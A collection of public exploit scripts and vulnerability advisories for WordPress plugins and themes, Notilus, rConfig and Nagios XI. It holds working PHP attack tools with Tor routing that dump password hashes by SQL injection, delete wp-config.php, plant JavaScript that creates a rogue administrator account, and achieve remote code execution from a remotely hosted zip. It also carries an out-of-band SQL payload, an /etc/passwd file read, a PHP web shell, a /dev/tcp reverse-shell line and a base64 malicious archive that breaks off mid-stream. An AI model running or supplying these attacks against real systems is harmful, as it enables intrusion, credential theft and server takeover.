*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:f:c:u:p:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
class CPDF_Adapter{
private $_image_cache;
public function set_file($file){
$this->_image_cache = array($file);
}
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'd'){
echo "Delete mode\n";
$pay_load_obj = new CPDF_Adapter();
$pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' );
$pay_load = base64_encode(serialize(array($pay_load_obj)));
$data = array('stats_pdf'=>'1', 'data'=>$pay_load);
$curl->post($options['t'].'?'.http_build_query($data));
$resp = $curl->getResponse();
echo $resp;
} else {
echo "SQLi mode \n";
echo "Trying a longin...\n";
logIn();
echo "Running SQL in Inject mode: ".$options['s']."\n";
$pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load);
$resp = $curl->getResponse();
//Grab the output
if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){
if (isset($mat[1])){
echo "Response:\n".$mat[1]."\n";
die("Done\n");
}
}
echo "Failed getting SQLi response, response saved to resp.html\n";
file_put_contents('resp.html', $resp);
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){
return false;
}
if ($options['m'] == 's' && (!isset($options['u']) || !isset($options['p']) || !isset($options['s'])) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
WP PRO Advertising System - All In One Ad Manager Expoit Pack
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE] -s [SQL]
*** In order to use the SQLi part you need an advertiser login **
[TARGET_URL] http://localhost/wordpress/
[MODE] d - Delete wp-config.php
s - SQL Injection
[TOR] Use tor network? (Connects to 127.0.0.1:9150)
Note: In SQLi mode, you can't use ' or ", and you are in a subselect.
To get all users and passwords you would do :
SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 1,1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 2,1
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files
php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1'
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
<?php
/**
* Exploit Titie: Bridge - Creative Multi-Purpose WordPress Theme Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://bridge.qodeinteractive.com/
* Software Link: http://themeforest.net/item/bridge-creative-multipurpose-wordpress-theme/7315054
* Version: 9.1.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Stored XSS, Ability to overwrite any theme settings.
* Time line: Found [23-Apr-2016], Vendor notified [23-Apr-2016], Vendor fixed: [Yes], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
switch ($options['m']){
case 'm' :
//Maintanence mode
echo "Putting site in maintenece mode\n";
$data = array('action' => 'qodef_save_options', 'qode_maintenance_mode'=>'yes');
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ".$resp."\n";
break;
case 'x' :
//XSS Mode, create extra admin
echo "Injecting inject.js \n";
$data = array('action' => 'qodef_save_options', 'custom_js'=>file_get_contents(dirname(__FILE__)."/inject.js"));
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ".$resp."\n";
break;
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('m','x') ) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Bridge Theme Exploit, Stored XSS, Create Admin account.
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[MODE] x - Permanent XSS DEMO, m - Maintenance Mode
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m x
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m m
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
?>
inject.js
});
//Get Token
var domain = location.protocol+'//'+document.domain;
var url = domain+'/wp-admin/user-new.php';
var JQ = jQuery.noConflict();
JQ.ajax({
"url": url,
"success" : function(x){
//Got the response
console.log('Got response');
var re = /name="_wpnonce_create-user"(\s+)value="([^"]+)"/g;
var m = re.exec(x);
if (m[2].match(/([a-z0-9]{10})/)) {
var nonce = m[2];
console.log('Got nonce '+nonce);
}
console.log('Registering, User: wp0day_poc, Pass: secret, Role: Admin ');
JQ.ajax({
"url": url,
"method" : "POST",
"data" :
{ "action":"createuser",
"_wpnonce_create-user": nonce,
"_wp_http_referer" : "/wp-admin/user-new.php",
"user_login": "wp0day_poc",
"email" : "contact@wp0day.com",
"first_name" : "Exploit",
"last_name" : "Poc",
"url" : "http://wp0day.com/",
"pass1" : "secret",
"pass1-text" : "secret",
"pass2" : "secret",
"send_user_notification" : 0,
"role":"administrator",
"createuser" : "Add+New+User"
},
"success" : function(x){
console.log("Register done");
}
});
}
});
$j(document).ready(function(){
<?php
/**
* Exploit Title: Uncode WP Theme RCE Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage:
* Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220
* Version: 1.3.0 possible 1.3.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: RCE, Arbirary file UPLOAD, (Low Authenticated )
* Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:u:p:f:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
echo "Generateing payload.\n";
$data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']);
echo "Sending payload\n";
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Eco response: ".$resp."\n";
$resp = json_decode($resp,true);
if ($resp['success'] === 'Font downloaded and extracted successfully.'){
echo "Response ok, calling RCE\n";
$file_path = parse_url($options['f']);
$remote_file_info = pathinfo($file_path['path']);
$zip_file_name = $remote_file_info['basename'];
$zip_file_name_php = str_replace('.zip', '.php', $zip_file_name);
$url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php;
echo 'Url: '. $url."\n";
//POC Test mode
if ($file_path['host'] == 'wp0day.com'){
echo "Exploit test mode on\n";
$rnd = rand();
echo "Rand $rnd, MD5: ".md5($rnd)."\n";
$url = $url . '?poc='.$rnd;
}
$curl->get($url);
echo "RCE Response:";
echo $curl->getResponse()."\n\n";
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if ( !isset($options['f']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Uncode WP Theme RCE Expoit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -f [URL]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[URL] It must be ZIP file. It gets unzipped into /wp-content/uploads/uncode-fonts/[some.zip]/files folder
Example: rce.php -> zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection
# Date: 06-06-2016
# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_POST['id']` is not escaped.
`populate_download_edit_form()` is accessible for every registered user.
http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html
2. Proof of Concept
Login as regular user.
<form name="xss" action="http://wordpress-url/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
<input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
<input type="submit" value="Send">
</form>
3. Solution:
Update to version 2.1.0
Exploit Title: Notilus SQL injection
Product: Notilus travel solution software
Vulnerable Versions: 2012 R3
Tested Version: 2012 R3
Advisory Publication: 03/06/2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: DIMO Software
Product & Version:
Notilus travel solution software v2012 R3
Vendor URL & Download:
http://www.notilus.com/
Product Description:
"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc."
(2) Vulnerability Details:
--------------------------
The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields.
Proof of concept:
POST TO /company/profilv4/Password.aspx
Vulnerable parameter: H_OLD
Payload:
ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27
(3) Advisory Timeline:
----------------------
15/02/16 - First Contact: vendor requests details of vulnerability
03/03/16 - Follow up to vendor to inquire about availability of a fix.
03/03/16 - vendor responds that fix will be available 16/03/16.
16/03/16 - Vendor releases patch.
(4)Solution:
------------
Patch to latest available 2012 R3 branch or upgrade to version 2016.
(5) Credits:
------------
Discovered by Alex Haynes
Title
===================
rConfig, the open source network device configuration management tool, Vulnerable to Local File Inclusion
Summary
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server.
Affected Products
===================
rConfig 3.1.1 and earlier
CVE
===================
N/A
Details
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. This is because downloadFile.php does not check the download_file parameter before it uses it. It merely opens and sends the file in the parameter to the user. As long as the account running the web server has access to it, rConfig will open it and send it.
Verification of Vulnerability
===================
The following steps can be carried out in duplicating this vulnerability.
Step 1:
Enter the following into your browser address bar:
http://<SERVER>/lib/crud/downloadFile.php?download_file=/etc/passwd
Step 2:
Confirm that the passwd file is valid
Impact
===================
Information Disclosure. User privileges and unauthorized access to the system.
Credits
===================
Gregory Pickett (@shogun7273), Hellfire Security
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios XI Multiple Vulnerabilities
Affected versions: Nagios XI <= 5.2.7
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
+-----------+
|Description|
+-----------+
The Nagios XI application is affected by multiple security
vulnerabilities, including unauthenticated SQL injection and
authentication bypass, arbitrary code execution via command injection,
privilege escalation, server-side request forgery and account hijacking.
These vulnerabilities can be chained together to obtain unauthenticated
remote code execution as the root user.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The ‘host’ and ‘service’ GET parameters in the ‘nagiosim.php’ page are
vulnerable to SQL injection via error-based payloads. An attacker can
exploit this vulnerability to retrieve sensitive information from the
application’s MySQL database such as the administrative users’ password
hash (unsalted MD5) or the token used to authenticate to the Nagios XI
REST API. This security issue is aggravated by the fact that an attacker
can directly browse to the vulnerable page and exploit the vulnerability
without providing a valid session cookie.
[POC - DUMP ADMIN API TOKEN]
GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+AND+
(SELECT+1+FROM(SELECT+COUNT(*),CONCAT('|APIKEY|',(SELECT+MID((IFNULL(CAST(backend_ticket+AS
+CHAR),0x20)),1,54)+FROM+xi_users+WHERE+user_id%3d1+LIMIT+0,1),'|APIKEY|',FLOOR(RAND(0)*2))
x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' HTTP/1.1
The API token can be reused to bypass authentication either by creating
a user via the REST API or through the Rapid Response functionality as
shown below.
[POC- BYPASS AUTHENTICATION THROUGH RAPID RESPONSE FUNCTIONALITY]
// uid == <user_id>-<object_id>-<MD5(api token)>, object id value
doesn't matter
GET /nagiosxi/rr.php?uid=1-b-<hash> HTTP/1.1
==Command Injection==
Multiple command injection vulnerabilities exist in the Nagios XI web
interface due to unescaped user input being passed to shell functions as
an argument. This issues can be exploited to inject arbitrary shell
commands and obtain remote code execution in the context of the 'apache'
user.
URL => GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=<api
token>&incident_id=<valid incident id>&title=<PAYLOAD>&status=<any value>
PARAMETER => title
POC PAYLOAD => title'; touch /tmp/FILE; echo '
URL => GET
/nagiosxi/includes/components/perfdata/graphApi.php?host=<any monitored
host IP>&start=<PAYLOAD>&end=<PAYLOAD>
PARAMETERS => start, end
POC PAYLOAD => 1; touch /tmp/FILE;
==Privilege Escalation==
The Nagios XI default sudoers configuration can be abused to elevate
privileges to root due to an insecure implementation of the
application’s component upload functionality. The ‘apache’ user can run
the getprofile.sh script with root privileges without being prompted for
a password. The getprofile.sh script is part of the Profile component
along with the following files:
- profile.php, the PHP script that outputs the system information.
- profile.inc.php, a PHP include file with required functionality for
profile.php.
An attacker can backdoor the profile.php file with a function to execute
arbitrary shell commands (e.g. <?php system($_GET['cmd']); ?> ), replace
the getprofile.sh file with a malicious payload (e.g. “#!/bin/bash bash
–i >& /dev/tcp/<IP>/<PORT> 0>&1”) and finally create a ‘profile.zip’
archive containing the malicious component files. Once uploaded, the
application will unzip the component archive and overwrite the existing
profile directory and its files, including getprofile.sh.
[POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE]
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
